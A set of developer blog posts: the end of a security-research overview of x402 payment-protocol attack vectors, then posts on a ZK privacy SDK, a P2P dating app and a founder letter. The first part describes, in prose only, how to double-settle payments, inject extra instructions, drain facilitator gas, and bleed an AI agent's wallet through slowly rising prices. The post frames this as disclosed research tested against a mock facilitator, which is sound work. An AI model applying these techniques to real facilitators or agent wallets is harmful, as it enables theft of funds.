| 1 | Settlement race condition | High | [walkthrough](/blog/x402_settlement_race_condition/) |
| 2 | Transaction manipulation (partial signing) | High | [walkthrough](/blog/x402_partial_signing_injection/) |
| 3 | Facilitator gas drain | Medium | [walkthrough](/blog/x402_facilitator_gas_drain/) |
| 4 | Blockhash replay window | Medium | (post 6) |
| 5 | Facilitator impersonation via feePayer field | Medium | (post 6) |
| 6 | AI-agent wallet exploitation | **High** | [walkthrough](/blog/x402_ai_agent_wallet_drain/) |
| 7 | Header injection / parsing bugs | Medium | (post 6) |
| 8 | ATA derivation manipulation | Medium | (post 6) |
| 9 | Amount-string parsing | Medium | [walkthrough](/blog/x402_amount_string_parser/) |

The five posts in this series cover Vectors 1, 2, 3, 6, 9 in detail. Vectors 4, 5, 7, 8 are noted in the [SOLMAL.md](https://github.com/Dax911/x402_mal/blob/main/SOLMAL.md) research log and will land as a sweep post once I've written PoCs for each.

## What's load-bearing about each vector

**Vector 1 (Settlement Race).** The verify→settle pipeline isn't atomic. A client can submit the same `PAYMENT-SIGNATURE` to multiple facilitators in parallel, or race the facilitator's submission with a conflicting transaction posted directly to Solana. Settlement double-execution lasts as long as the blockhash is valid (~60s).

**Vector 2 (Partial Signing).** The client builds the entire transaction. The facilitator validates structure but typically doesn't audit *every byte* of every instruction. A malicious client appends extra instructions — a token-2022 hook, a clawback, an arbitrary CPI — that fire after the transfer.

**Vector 3 (Facilitator Gas Drain).** The protocol specifies no per-client rate limit on the facilitator. Crafted transactions that **fail validation in the worst possible way** (consuming maximum CU before reverting) are still paid for by the facilitator. Economic DoS.

**Vector 6 (AI-Agent Wallet).** The agent has a programmatic keypair and auto-approves payments below a price threshold. A service that starts at $0.001/req and ramps to $0.10/req over 1000 requests drains the wallet *without ever crossing the threshold*. The threshold check is done per-request, not per-session, not per-vendor.

**Vector 9 (Amount Parsing).** Amounts in x402 are JSON strings like `"1000"`. Different implementations parse `"1000"` vs `"1e3"` vs `" 1000 "` vs `"+1000"` vs `"01000"` differently. Mismatch between facilitator's validator and Solana's actual transfer = monetisable.

## Disclosure posture

This is **public research** against an open protocol with multiple independent implementations. I did not test against any specific facilitator without permission. The PoCs target a mock facilitator I wrote in the [research/](https://github.com/Dax911/x402_mal/tree/main/research) tree.

For specific vendor implementations:

- I have not contacted Coinbase. The protocol is open; the bugs are in the spec, not in any single implementation.
- If your team operates an x402 facilitator and any of this looks live in your code: please email me. Bridge: [haydenaylor911@gmail.com](mailto:haydenaylor911@gmail.com).
- I'll honour a 90-day embargo if you have a remediation plan.

## What's coming in the series

5 deep-dive posts on the highest-impact vectors:

1. [Settlement race condition](/blog/x402_settlement_race_condition/) — Vector 1, double-spend within blockhash validity
2. [Partial-signing instruction injection](/blog/x402_partial_signing_injection/) — Vector 2, append-and-execute
3. [Facilitator gas drain](/blog/x402_facilitator_gas_drain/) — Vector 3, economic DoS
4. [AI-agent wallet drain](/blog/x402_ai_agent_wallet_drain/) — Vector 6, slow-burn pricing
5. [Amount-string parser fuzzing](/blog/x402_amount_string_parser/) — Vector 9, JSON-numeric edge cases

Plus a sweep post for Vectors 4, 5, 7, 8 once the PoCs land.

## Bibliography

- Coinbase Developer Platform. *x402 Specification.* https://x402.org/
- HTTP/1.1: Semantics. *RFC 7231 §6.5.2 (402 Payment Required).*
- Solana Foundation. *VersionedTransaction documentation.*
- [Dax911/x402_mal](https://github.com/Dax911/x402_mal) — research repo; SOLMAL.md is the threat-model log.

Series finale: [Settlement race condition →](/blog/x402_settlement_race_condition/)


---

# Building the Zera SDK: Day One

Canonical: https://blog.skill-issue.dev/blog/zera_sdk_scaffolding/
Description: Sixteen commits in fourteen minutes. The first day of the @zera-labs/sdk monorepo — Rust core via neon-rs, TypeScript scaffolding, Poseidon, Merkle trees, ZK provers, and an MCP server for AI agents.
Published: 2026-03-05T21:54:29.000Z
Tags: zera, typescript, rust, sdk, zk, poseidon, mcp, solana


> "init monorepo structure"

That commit message — [`af8cc28`](https://github.com/Dax911/zera-sdk/commit/af8cc28644e055bebc6e6688c3b7d534aca5b202), 2026-03-05T21:54:29Z — is when the Zera SDK began. Sixteen commits later, fourteen minutes after, the scaffolding was done: a Rust crate, a Neon native binding, a TypeScript SDK with Poseidon + Merkle + provers + transaction builders, and an MCP server. The whole arc is visible on [the commit log](https://github.com/Dax911/zera-sdk/commits/main) — every commit dated within the same minute, every commit doing exactly one thing.

This post is about how the day-one scaffolding was structured, why I split it into 16 atomic commits, and what each piece actually does.

## The shape of the monorepo

Three packages from the start:

```
packages/
  zera-core/      # Rust crate — circuit-aligned crypto primitives
  zera-bindings/  # Neon-rs node bindings exposing zera-core to JS
  sdk/            # @zera-labs/sdk — TypeScript SDK
  mcp-server/     # @zera-labs/mcp-server — MCP tools for AI agents
```

The reason `zera-core` exists in Rust is that the on-chain Solana program is also in Rust, and the SDK has to compute Poseidon commitments and Groth16 proof formatting *exactly* the way the on-chain verifier does. JS and Rust agreeing on a 254-bit field element is the kind of thing that goes wrong silently. Moving the canonical implementation to Rust and exposing it to JS via Neon kept the two halves bitwise consistent.

The TypeScript SDK is what 95% of users will touch. The MCP server is the bet that the next class of "user" will be an AI agent, not a human in a wallet popup.

## Atomic commits as a design discipline

If you scan the [commit log](https://github.com/Dax911/zera-sdk/commits/main), you'll see this pattern from `af8cc28` through `e350707`:

```
af8cc286  init monorepo structure
7ba37e6e  add zera-core rust crate
d605b930  add neon-rs node bindings for zera-core
4aaa8def  add ts sdk package scaffolding + crypto primitves
26f77955  add note mgmt, merkle tree, pda helpers, utils
f713bb3f  add zk prover + voucher system
cd518d5a  add transaction builders for deposit/withdraw/transfer
0debc6af  add tree state client for fetching merkle tree from chain
f4beda30  add ZeraClient high-level wrapper + NoteStore
27786470  update barrel exports w new modules
d150f829  add mcp server package for ai agent integration
98bc0a88  add core sdk documentation
dc2937ae  add agentic integration guide + use cases
af03daf2  add examples, security doc, and current status analysis
```

Each commit is one logical concept and nothing else. The reason this matters: when you're scaffolding a 200-file SDK in a single session, the sane way to bisect a regression two months later is to `git revert` a single concept. If the Merkle tree breaks, you revert `26f77955`. If the prover wires wrongly, you revert `f713bb3f`. If you ship the whole thing as one mega-commit, you can't isolate.

It also makes the SDK reviewable. There's no "Initial commit (12,000 lines)." You can read it in 14 minutes the way I wrote it in 14 minutes.

## The crypto layer

The cryptographic foundation is in [`packages/sdk/src/crypto/poseidon.ts`](https://github.com/Dax911/zera-sdk/blob/4aaa8def935c617cb447040bb6cb6f22aeefbf4e/packages/sdk/src/crypto/poseidon.ts). Poseidon is the hash function we use everywhere — for note commitments, for Merkle nodes, for nullifiers. It's circuit-friendly, which means it's cheap to prove inside a Groth16 circuit. SHA-256 inside a circuit is *thousands* of constraints. Poseidon is dozens.

```ts
import { buildPoseidon } from "circomlibjs";

let poseidonInstance: any = null;

export async function getPoseidon(): Promise<any> {
  if (!poseidonInstance) poseidonInstance = await buildPoseidon();
  return poseidonInstance;
}

export async function poseidonHash(inputs: bigint[]): Promise<bigint> {
  const poseidon = await getPoseidon();
  const hash = poseidon(inputs.map((v: bigint) => poseidon.F.e(v)));
  return BigInt(poseidon.F.toObject(hash));
}

export async function poseidonHash2(left: bigint, right: bigint): Promise<bigint> {
  return poseidonHash([left, right]);
}
```

The singleton is load-bearing. `buildPoseidon` initializes WASM that takes ~80ms cold. If every Merkle node hash had to spin that up, building a tree with `TREE_HEIGHT = 24` would take 30 seconds.

## Notes are bigints all the way down

From [`types.ts`](https://github.com/Dax911/zera-sdk/blob/4aaa8def935c617cb447040bb6cb6f22aeefbf4e/packages/sdk/src/types.ts):

```ts
export interface Note {
  amount:   bigint;
  asset:    bigint;
  secret:   bigint;
  blinding: bigint;
  memo:     [bigint, bigint, bigint, bigint];
}

export interface StoredNote extends Note {
  commitment: bigint;
  nullifier:  bigint;
  leafIndex:  number;
}
```

Every field is a `bigint`. The reason: every field has to be reducible mod BN254 prime to enter a circuit, and that's a 254-bit operation. JS `Number` is 53 bits. Using `bigint` from day one means every constant in the SDK is correct as written:

```ts
export const BN254_PRIME = BigInt(
  "21888242871839275222246405745257275088548364400416034343698204186575808495617",
);
```

The cost of `bigint` everywhere is that you can't `Math.max` your way out of a comparison. The benefit is that you can never lose a low bit by accident.

## `createNote`: the most important six lines

```ts
function randomFieldElement(): bigint {
  const bytes = randomBytes(31); // 248 bits – safely below the 254-bit prime
  const value = BigInt("0x" + bytes.toString("hex"));
  return value % BN254_PRIME;
}

export function createNote(amount, asset, memo?): Note {
  return {
    amount, asset,
    secret:   randomFieldElement(),
    blinding: randomFieldElement(),
    memo:     memo ?? [0n, 0n, 0n, 0n],
  };
}
```

The note's `secret` is what derives the nullifier. If you can predict it, you can predict the nullifier, and your transaction is forensically linkable. Sampling 248 bits and reducing mod the BN254 prime is the standard recipe; sampling 256 bits would bias the distribution slightly toward small field elements after the modular reduction.

## Transaction builders: the SDK's actual surface area

From [`tx/deposit.ts`](https://github.com/Dax911/zera-sdk/blob/cd518d5ace208ebebf5852ed38c8dff11b6d23b4/packages/sdk/src/tx/deposit.ts):

```ts
export function buildDepositTransaction(params: DepositParams): Transaction {
  const { payer, mint, amount, commitment, proof, publicInputs, programId } = params;
  // Derive PDAs
  const [poolConfig] = derivePoolConfig(mint, programId);
  const [merkleTree] = deriveMerkleTree(mint, programId);
  const [vault]      = deriveVault(mint, programId);
  // ...
}
```

Three transaction builders: `buildDepositTransaction`, `buildWithdrawTransaction`, `buildTransferTransaction`. Each one consumes a Groth16 proof + commitment, derives the right PDAs, and returns an unsigned `Transaction`. The signing is intentionally not the SDK's job. That's the wallet's job, and embedding signing in an SDK is what gives you a tarball of leaked keys six months later.

## ZeraClient: the high-level wrapper

By the time we got to `f4beda30 — add ZeraClient high-level wrapper + NoteStore`, the lower-level pieces were composable enough that one class could orchestrate them. The wrapper takes a config:

```ts
export interface ZeraClientConfig {
  rpcUrl: string;
  programId?: string;
  circuits: {
    deposit:  CircuitPaths;
    withdraw: CircuitPaths;
    transfer: CircuitPaths;
  };
  noteStore?: NoteStore;
  cacheEndpoint?: string;
}
```

…and exposes one method per high-level operation. `client.deposit(amount, mint)`, `client.withdraw(commitment)`, `client.transfer(amount, recipient)`. Behind each method is the pipeline: fetch tree state → load relevant circuit WASM → prove → build tx → return unsigned `Transaction` for the wallet to sign.

`NoteStore` is an interface with one default in-memory implementation and a contract that says "if you persist notes, you're responsible for not leaking them." Most consumers will plug an encrypted file backend. The wallet demo plugs Tauri's filesystem with Argon2id-derived keys; we'll get to that in [the Zera Wallet v3 post](/blog/zera_wallet_v3_zkp/).

## MCP: betting on agents

The most experimental thing on day one was `@zera-labs/mcp-server`. From [`packages/mcp-server/src/index.ts`](https://github.com/Dax911/zera-sdk/blob/d150f8294dca2bdcfd4f3b38da53b346aef64773/packages/mcp-server/src/index.ts):

```ts
const server = new McpServer({ name: "zera-protocol", version: "0.1.0" });

server.tool(
  "zera_deposit",
  "Deposit USDC into the ZERA shielded pool. Funds become private and untraceable after deposit.",
  {
    amount: z.number().positive().describe("Amount of USDC to deposit (e.g., 100.50)"),
    memo:   z.string().optional().describe("Optional memo for your records (stored privately, never on-chain)"),
  },
  async ({ amount, memo }) => { /* … */ },
);
```

If the only thing that talks to your protocol is wallets, your TAM is "humans who installed an extension." If MCP-connected agents can also call your protocol, your TAM is "every Claude/Cursor/Cline session anyone runs." That's a 100× delta. The bet is cheap — `mcp-server` is one ~400-line file plus the SDK it depends on. If agents end up *not* using zk-shielded pools, I lose 400 lines. If they do, I get there first.

## Trade-offs

**Why circomlibjs instead of a hand-rolled Poseidon?** Because circomlib is the canonical implementation that the circuits are written against. Re-implementing Poseidon for the host is exactly the kind of "I'll save 50ms" choice that fails an end-to-end test in week three.

**Why Neon instead of WASM for `zera-core`?** Because the SDK ships to Node and to a Tauri webview, both of which natively support `.node` files. WASM would have meant another loader, another fetch, another async boundary. Neon is one `require`.

**Why ship the MCP server in the same monorepo?** Because the moment you give it its own repo, it falls behind on SDK changes. Same monorepo, same `pnpm-workspace.yaml`, same lockfile. One `pnpm install` and you're done.

## What this taught me

Atomic commits are the difference between an SDK that's reviewable and an SDK that's trusted. Every dependency relationship in the scaffolding above is one-directional and one-commit-at-a-time. That's why the `144-test test suite` ([`80927`](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c)) that landed three weeks later could be written without rewriting any of the underlying code — see [the next post](/blog/zera_sdk_test_suite/).

## Further reading

- [zera-sdk on GitHub](https://github.com/Dax911/zera-sdk)
- [The 16-commit scaffolding sequence](https://github.com/Dax911/zera-sdk/commits/main)
- [circomlibjs — Poseidon implementation](https://github.com/iden3/circomlibjs)
- [Neon — Rust ↔ Node bindings](https://neon-bindings.com/)
- [Model Context Protocol](https://modelcontextprotocol.io/) — the spec MCP servers implement.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the privacy thesis these primitives implement.


---

# Cruiser: A Tauri Hookup App on iroh, Geohash-Bucketed Presence, and Why P2P Dating Is Actually Fine

Canonical: https://blog.skill-issue.dev/blog/cruiser_iroh_gossip_p2p/
Description: A Tauri 2 + React + iroh-gossip dating app where peers find each other by geohash, broadcast presence on a topic-per-bucket, and DM each other with consent signals — all without a central server. The architecture is the product.
Published: 2026-02-26T15:15:06.000Z
Tags: cruiser, tauri, iroh, p2p, gossip, rust, geohash, solana


The dating app market in 2026 is two things: dystopian centralized platforms (Match Group's stable: Tinder, Hinge, OkCupid, etc.) and crypto-bro-coded alternatives that promise decentralization but ship a Mongo cluster behind the API. Neither is what the queer community I built Cruiser for actually wanted. They wanted **a dating app where the only servers were the participants' own devices**, where presence was bucketed by location without any single party seeing all locations, and where the wallet was the identity but the wallet wasn't a custody surface.

Cruiser shipped on 2026-02-26 in [`4cecbd4 — Cruiser: P2P hookup app — Phases 1–26`](https://github.com/Dax911/cruiser/commit/4cecbd4cf64fe2bdcd44f0aa3b6db83b1ebd3a05). 89 files. ~20,000 lines. Tauri 2.x for the desktop wrapper, React 18 + Zustand for the UI, [iroh-gossip](https://github.com/n0-computer/iroh) for the P2P transport, Solana for the wallet/payment rails. The full mono-commit is the result of 26 phases of design + implementation that I'd been working on locally, then squashed into one commit before pushing.

This post is about the gossip-presence architecture in particular, because that's where the "no servers" promise actually has to be defended.

## The geohash topic split

iroh-gossip is a publish/subscribe protocol over a peer-mesh, with content-addressed `TopicId`s. Every peer that subscribes to a `TopicId` joins the same gossip mesh and exchanges messages. The naive thing is to use *one* topic for the whole app — `cruiser/v1` — and broadcast every presence announce to every peer.

This is a privacy disaster. It means every peer sees every other peer's broadcast, including their location. The architecture that ships in Cruiser is per-geohash topics:

```rust
// src-tauri/src/gossip_presence.rs
const AREA_TOPIC_PREFIX: &str = "cruiser/area/v1/";

let topic_bytes = location::topic_from_geohash(AREA_TOPIC_PREFIX, geohash6);
let topic_id = TopicId::from_bytes(topic_bytes);
```

The topic is `cruiser/area/v1/<geohash6>`. **Every 6-character geohash bucket is its own topic.** A geohash6 covers approximately a 1.2 km × 0.6 km area — small enough to be a single neighborhood, large enough to have actual users in it. Two peers join the same topic only if they're in the same geohash6 bucket.

This is the privacy architecture in one decision: **you can only see the presence of peers who chose to be visible in the same geographic bucket as you.** A peer in San Francisco can't see a peer in Berlin's gossip. Even within a city, a peer in the Mission can't see a peer in the Castro, because those are different geohash6 buckets.

The cost of this design: peers walk between geohash6 boundaries (you cross a street, you're in a new bucket). The app handles this by *leaving* the old topic and *joining* the new one whenever the user's geohash6 changes. That's the lifecycle the `ActiveArea` struct manages:

```rust
pub struct ActiveArea {
    pub topic_id: TopicId,
    pub geohash6: String,
    pub sender: Arc<GossipSender>,
    broadcast_handle: JoinHandle<()>,
    receive_handle: JoinHandle<()>,
    reaper_handle: JoinHandle<()>,
}

impl ActiveArea {
    pub fn leave(self) {
        self.broadcast_handle.abort();
        self.receive_handle.abort();
        self.reaper_handle.abort();
    }
}
```

`leave` aborts all three Tokio tasks — broadcast loop, receive loop, peer-cache reaper — and drops the topic subscription. The next location update triggers a `join_gossip_area` for the new geohash, and the cycle repeats.

## The three tasks per area

Every joined area spawns:

1. **A broadcast task** that sends a `PresenceAnnounce` (your profile snippet, your endpoint ID, your tags) every 30 seconds.
2. **A receive task** that handles incoming announces and updates a local `PeerCache`.
3. **A reaper task** that runs every 60 seconds and evicts peers that haven't announced in 90 seconds.

```rust
const BROADCAST_INTERVAL_SECS: u64 = 30;
const REAPER_INTERVAL_SECS: u64 = 60;
```

The 30s broadcast / 90s eviction (= reap if no announce in 3 broadcasts) gives you a "go offline within 90s" guarantee. If a peer disconnects from WiFi, walks out of range, or quits the app, every other peer's view of them ages out within a minute and a half. No central server needed to mark them offline.

This is the *whole* mechanism for "who's online right now in your area." There is no `presence-server.cruiser.app/online`. The presence is the gossip itself.

## What an announce looks like

```rust
// src-tauri/src/presence.rs (simplified)
#[derive(Serialize, Deserialize, Clone)]
pub struct PresenceAnnounce {
    pub endpoint_id: String,    // iroh node ID — the P2P address
    pub geohash6: String,       // your bucket (intentionally redundant for receivers)
    pub display_name: String,
    pub avatar_hash: String,    // CID of avatar image; sender mirrors via iroh-blobs
    pub bio_short: String,      // ~80 chars max
    pub energy: String,         // a profile field — "🔥 high energy", "🌙 chill", etc.
    pub tags: Vec<String>,      // user-set tags for search/filter
    pub last_seen_ms: u64,      // sender's local clock at announce time
    pub signature: String,      // ed25519 sig over the rest, by the user's identity key
}
```

A few interesting design calls:

**Avatar by CID, not inlined.** The avatar is a hash; the actual image bytes are fetched via [iroh-blobs](https://docs.rs/iroh-blobs/) on a separate transport from the gossip topic. Inlining the avatar would balloon every announce to ~50KB and make the gossip topic unreasonably noisy. CID + lazy fetch is ~256 bytes per announce.

**`signature` is the integrity surface.** Every announce is signed by the user's identity key. A peer receiving an announce verifies the signature before adding to the peer cache. Without this, anyone could broadcast an announce claiming to be anyone else; with it, an impostor announce is detected and dropped.

**`last_seen_ms` is the announcer's clock.** Not a synchronized clock. The receiver uses this for "rough freshness" but not for anti-replay — anti-replay is handled by the iroh-gossip layer's own message dedup based on content hash + topic.

## Direct messages: a separate topic per pair

DMs work the same way, with a different topic shape. From `src-tauri/src/gossip_dm.rs`:

```
cruiser/dm/v1/<sorted-endpoint-id-pair>
```

The endpoint IDs of the two peers are sorted lexicographically and concatenated. Both peers compute the same topic ID. Joining the topic establishes a 2-peer gossip mesh. Messages are encrypted with `nacl.box` (XSalsa20-Poly1305) using the peers' x25519 keys, derived from their ed25519 identity keys.

The threat model:

- **An eavesdropper on the gossip mesh** sees the topic ID (which is opaque without the endpoint IDs that produced it) and ciphertext. They learn nothing about the participants or content.
- **A passive observer of the iroh DHT** sees the two endpoint IDs subscribing to a common topic, which leaks "these two people are in a DM" but not the content. Acceptable; DMs in any system leak metadata at this level.
- **A man-in-the-middle** can't insert messages because they're encrypted with `nacl.box` keyed to the receiver's pubkey. They can't drop messages without the sender noticing (no acks, but the ordering would be visibly wrong).

The DM topic also handles tips, consent signals, location sharing, typing indicators, read receipts, and emoji reactions. All of those are just message variants in the same encrypted topic — there's no separate channel for them. The reason: a separate channel for "I'm typing" would itself leak the metadata "person A is typing to person B" without authentication. Folding everything into the encrypted DM topic eliminates that side channel.

## Why iroh-gossip and not libp2p

I evaluated three P2P stacks before landing on iroh:

- **libp2p (Rust):** the de-facto standard. Powerful, but operationally heavy — DHT, NAT traversal, transports, and a non-trivial topology config. It's overkill for a single-purpose app.
- **GossipSub (libp2p):** the gossip protocol within libp2p. Closer to what I needed, but still requires the full libp2p stack as host.
- **iroh + iroh-gossip:** purpose-built for "P2P Rust app needs gossip." Smaller surface area, batteries-included relay/DHT/NAT-traversal via iroh's hosted public infrastructure. Subjectively faster to ship.

iroh hosts a public relay infrastructure (`relay.iroh.network`) that handles NAT traversal and STUN-style address discovery. Most home users are behind NAT, so without relay infrastructure most P2P apps don't work in practice. iroh's relay is opt-in and free for development; that's what I used.

The trade-off: **iroh is younger than libp2p**, the API surface is still moving, and the network effects are smaller (fewer peer apps to interop with). For Cruiser this is fine — there are no peer apps it needs to interop with — but for a project that wanted to join the existing libp2p universe, iroh would be the wrong call.

## CoreLocation, IP fallback, and the geolocation rabbit-hole

The whole gossip architecture above is meaningless without the user's actual location. Browser `navigator.geolocation` doesn't work in Tauri's macOS WKWebView (wry auto-denies the permission). The follow-up commit [`d2b9cc8 — Phase 27: Native CoreLocation for macOS`](https://github.com/Dax911/cruiser/commit/d2b9cc8) is where I solved that, and it's [its own post](/blog/cruiser_corelocation_objc2/).

Worth noting here: the system has *three* fallback layers for location:

1. Native CoreLocation (macOS) / GeoClue2 (Linux) / Windows.Devices.Geolocation (Windows). Best accuracy.
2. IP-based geolocation via ipinfo.io. Used when native services are unavailable or denied.
3. Manual override (you type your geohash6 into a settings field). Used for testing and for users who don't want their actual location used.

Each layer feeds the same `geohash6` value to `join_gossip_area`. The peer doesn't care how the geohash was computed; they care that the geohash is honest and stable.

## What "Phase 1–26" means

The mono-commit covers 26 design phases. A non-exhaustive sample of what each phase added:

- Phase 1–3: Identity (ed25519 key + Solana pubkey).
- Phase 4–6: Profile (avatar, bio, energy, tags).
- Phase 7–9: Gossip presence (the architecture above).
- Phase 10–12: DM chat (encrypted, with media + tips + consent signals).
- Phase 13: Block list.
- Phase 14: Favorites.
- Phase 15: Notifications.
- Phase 16: Themes.
- Phase 17: Search.
- Phase 18: Onboarding (the new-user flow).
- Phase 19–21: Chat management (delete threads, relative timestamps, profile peek).
- Phase 22–25: Dev tools (seed peers for local testing, SOL airdrop UI).
- Phase 26: The final polish + the squash into one commit.

The reason to squash 26 phases into a single commit is that the local development repo had 200+ commits with messages like `wip` and `fix wallet sig` and `actually now it works`, and that's not a public history. The squash gives readers a single coherent diff that says "this is what shipped." The cost: you lose the ability to bisect within Phase 1–26. The benefit: you don't subject the public to a noisy 200-commit history.

## What I'd do differently

**The PeerCache should be persistent.** Right now, when you restart the app, you lose the in-memory peer cache and have to wait 30s for the next broadcast cycle to repopulate. Persisting it (and re-validating on next announce) would make the first-second of app launch feel responsive instead of empty.

**The geohash6 boundary needs hysteresis.** Crossing a geohash boundary triggers a topic-leave / topic-join cycle. If you walk along the boundary you can flap between buckets every few seconds. The fix is to wait for a few consecutive readings on the new bucket before switching, or to subscribe to *both* buckets while in transition. Neither is implemented in the initial commit; both are easy add-ons.

**The signature scheme should bind to the topic.** Right now an announce signed for topic A could be replayed on topic B by an adversary who controls a relay. Including the topic ID in the signed payload would prevent that. Easy fix; on the to-do list.

## Trade-offs

**Why a desktop app first instead of mobile?** Because Tauri's desktop story was mature in 2025 and the iOS / Android mobile bindings were still beta. The [Phase 29 iOS commit](/blog/cruiser_ios_xcode_cloud/) shipped iOS support a few weeks later; Android is still pending.

**Why Tauri instead of Electron?** Same reason as the [Zera Wallet v3](/blog/zera_wallet_v3_zkp/): smaller bundle, sane Rust↔JS IPC, and the Rust side can hold long-running background tasks (gossip loops, location service) without spinning up a separate process.

**Why a per-pair DM topic instead of a single shared "DMs" topic?** Because per-pair topics are the right scope for routing — only the two participants subscribe — whereas a shared topic would require every peer to receive every DM and filter by recipient. That's both wasteful and a metadata leak.

**Why no central reputation/abuse system?** Because the moment you ship a central reputation system, the system is no longer P2P. The Cruiser approach is: every peer maintains their own block list, locally. Abuse is mitigated by the absence of a global directory — you can only be discovered by people in your geohash6, so the attack surface is bounded by your physical area.

## What this taught me

P2P-as-architecture is mostly *constraints management*: deciding what state is allowed to be global (almost nothing), what state is allowed to be partial (peer caches, ephemeral), and what state is fully local (your block list, your profile, your settings). Once you've drawn those lines, the rest of the design falls out.

The other thing I learned is that **iroh deserves more attention.** It's the smallest dependency I've ever shipped that supports a real P2P product. Most P2P stacks are 50,000-line behemoths. iroh-gossip + iroh-net + iroh-blobs is enough infrastructure for a real app and the code surface is comprehensible.

## Further reading

- [Cruiser on GitHub](https://github.com/Dax911/cruiser)
- [The Phase 1–26 mono-commit](https://github.com/Dax911/cruiser/commit/4cecbd4cf64fe2bdcd44f0aa3b6db83b1ebd3a05)
- [iroh on n0.computer](https://www.iroh.computer/) — the P2P stack.
- [`iroh-gossip` docs](https://docs.rs/iroh-gossip/) — the pub/sub layer.
- [Cruiser CoreLocation post](/blog/cruiser_corelocation_objc2/) — how the geolocation layer works.
- [Cruiser iOS + Xcode Cloud](/blog/cruiser_ios_xcode_cloud/) — the App Store push.
- [Cruiser+ landing page](/blog/cruiser_site_satori_poster/) — the marketing surface.


---

# Why I started Zera Labs

Canonical: https://blog.skill-issue.dev/blog/why_i_started_zera_labs/
Description: Three things became true in the same year — ZK got fast enough, Solana got cheap enough, and AI agents needed verifiable money. Sitting at the intersection felt like a ship date, not a thesis.
Published: 2026-02-20T08:00:00.000Z
Tags: founders, zera, zk, solana, ai, narrative, founder-letter


This is the post I keep wanting to skip. It's the founding letter — the one where I'm supposed to explain, in clean prose, why a perfectly happy senior IC with a security-research side hustle decided to incorporate a thing and put his name on the door. I have started writing it five times. The other four versions all went a little too hard on the *grand cryptographic destiny of the human race* angle, which is not the kind of post I'd respect if I read it in someone else's feed.

So here is the version that survived: three things became true at roughly the same time, in the same year, and sitting at the intersection of those three things felt much more like a ship date than a thesis. That's the whole pitch. The rest of this letter is just walking the three legs of the tripod.

## Leg one: ZK got fast enough to be boring

I have been reading zk papers for, depending on how you count, six or seven years. The thing about zk papers is that the *math* doesn't get faster — the math has been there since Goldwasser and Micali's 1985 paper. What gets faster is the *engineering*. Better proving systems (Groth16 → PLONK → Halo2 → STARKs → folding schemes). Better hashes inside circuits (Pedersen → Poseidon → Reinforced Concrete). Better hardware (CPU SIMD → GPUs → FPGAs → the inevitable ASIC). Better libraries (snarkJS → arkworks → halo2 → Lurk → Risc Zero).

In 2018, you could prove a non-trivial program in a circuit and submit it to Ethereum, but you needed a research lab and a friend at a hardware accelerator company. In 2024, you could prove a non-trivial program in a circuit on a laptop in a few seconds and submit it to a chain that didn't price proof verification like a war crime.

In 2026, the prover is fast enough that **a wallet can do it on the user's machine for a normal interactive payment** without the user noticing. That last sentence is the entire reason ZK leaves the lab.

The bar for "leaves the lab" is ruthless. It isn't "research demo at Devcon." It's: a non-technical user, on their existing laptop, opens a wallet, clicks Send, waits less than a coffee sip, and a Groth16 proof has gone over the wire to settle the transaction. Until that is true, ZK lives in conferences and academic papers. Once that is true, ZK eats a chunk of the financial system.

That is the point we are at right now. I built [zera-sdk](/blog/zera_sdk_scaffolding/) and the [Zera Wallet v3](/blog/zera_wallet_v3_zkp/) to be the first products to ship after that line was crossed. Not after the line will be crossed, after some round, after some grant. After. It already happened. We are mostly waiting for the rest of the industry to notice.

## Leg two: Solana stopped being a gas-fee story

I came up at ConsenSys. I love the EVM the way you love a complicated relative — deeply, suspiciously, with a lot of patience. But the EVM was not designed for a world in which a privacy-preserving deposit costs you a single-digit number of cents and a transfer costs less. The EVM was designed for a world in which compute is precious and you charge by the opcode.

Solana is the opposite design point. Compute is cheap, throughput is high, parallelism is the default, and — critically — Light Protocol's compressed-token primitive lets you push almost the entire account state of a token into an off-chain Merkle tree. The savings are not marginal. They are something like 5000× per token. I spent a weekend porting a notional AMM to Solana for the first time and the gas numbers came out so low I assumed I had a math error. I did not. The chain is just that much cheaper.

I wrote about the implications in [ZeraSwap: An AMM for Compressed Tokens](/blog/zeraswap_compressed_amm/). The short version: when the per-account-state cost of a token drops by three and a half orders of magnitude, every assumption you had about the *granularity* of tokenisation has to be re-examined. You can have one token per medical record. One token per receipt. One token per proof. The cost of "putting it on chain" stops being a budgeting decision and starts being a *naming* decision.

ZK is the privacy half. Compressed tokens are the bandwidth half. If you have both, you have the substrate I would have wanted for [the cryptocurrency we should have built](/blog/a_better_crypto/).

## Leg three: AI agents need verifiable money

This is the leg that tipped me from "interesting hobby" to "I'm doing this full-time." It's also the leg the most people get wrong, so I want to walk it carefully.

If you have not played with the Model Context Protocol yet, the elevator version is: an AI agent (Claude, Cursor, Cline, your custom thing) connects to a *server* that exposes tools the agent can call. The server might be a calendar. The server might be a database. The server might be — and here is where it gets interesting — a wallet.

In 2025 a lot of teams glued LLMs to wallets and discovered, predictably, that the result was funny but not safe. Funny because LLMs are very confident; not safe because wallets, being unverified pieces of state, can be lied to in ways the model has no way to verify. The result was a small wave of "agent steals the demo wallet's testnet ETH" videos that everyone enjoyed and then forgot about.

The fix isn't smaller models or more guardrails. The fix is **verifiable cryptographic state**. If the agent asks the server "do I have the right to spend this note?", the server should be able to produce a proof that the agent can verify *locally*, with the same trust model the chain itself uses. Not a screenshot. Not an oracle. A Groth16 proof that the agent's runtime checks against the same verifying key the chain holds.

This is the reason `@zera-labs/mcp-server` exists, and it's the reason it shipped on the [first day](/blog/zera_sdk_scaffolding/) of the SDK rather than as a v2 feature. If agents are going to interact with money — and the rate at which the next generation of agentic products is being shipped tells me they are — they need the same cryptographic verifiability that human users now expect from a wallet. The MCP layer is the agent's wallet. The SDK below it is the cryptographic verifiability. The chain underneath is the settlement.

You don't have to believe the agent thesis is going to be huge. You only have to believe it isn't going to be zero. The MCP server is, on the day this letter ships, less than 500 lines of code. If the bet is wrong, I lose 500 lines of code. If it's right, the SDK ships into a market that is roughly 100× larger than the human-wallet market.

## Why a company instead of more posts

People who have read me for a while know I do most of my thinking out loud, in writing, on this blog. There's an obvious version of all the above that's just *more posts about it*. Why a whole company.

Two reasons.

First: the surface area is larger than one person. The SDK alone is a Rust crate, a Neon binding, a TypeScript SDK, a prover, an MCP server, three transaction builders, a Surfpool devnet, a 144-test Vitest suite, and a documentation surface. The wallet is its own product. The AMM is its own product. The medical demo is its own product. The design system is its own product. I cannot ship that on weekends. Nobody can.

